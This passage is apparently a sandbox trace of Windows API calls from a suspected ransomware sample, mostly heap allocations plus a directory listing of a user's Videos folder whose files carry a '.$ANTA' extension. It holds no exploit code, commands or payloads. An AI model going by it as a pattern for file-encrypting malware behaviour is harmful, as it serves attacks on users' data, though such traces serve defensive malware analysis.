hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.427] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.428] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x633918d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x633918d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9f20, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0097.428] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x633918d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x633918d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9f20, cFileName="..", cAlternateFileName="")) returned 1 [0097.428] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x603e3bf, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x603e3bf, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x61230bc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xfba0, dwReserved0=0x0, dwReserved1=0x43c9f20, cFileName="1OjHCE.swf.$ANTA", cAlternateFileName="1OJHCE~1.$AN")) returned 1 [0097.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0097.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.428] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0097.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0097.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.429] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0097.429] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.430] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.430] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0097.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0097.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0097.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0097.431] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.431] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.477] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x616f670, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x616f670, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x62c6acc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="vJ4PRQa2pJimDueSCaM.mkv.$ANTA", cAlternateFileName="VJ4PRQ~1.$AN")) returned 1 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0097.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0097.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.478] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.478] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0097.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0097.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f20 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0097.479] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.479] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.479] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e23a0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e23a0, ftLastWriteTime.dwLowDateTime=0x43ea730, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="﫠мńဓ+\x10")) returned 0 [0097.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.480] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ff8 [0097.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0097.481] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.481] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.481] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0097.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fe0 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ff8 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca010 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ed8 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca088 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 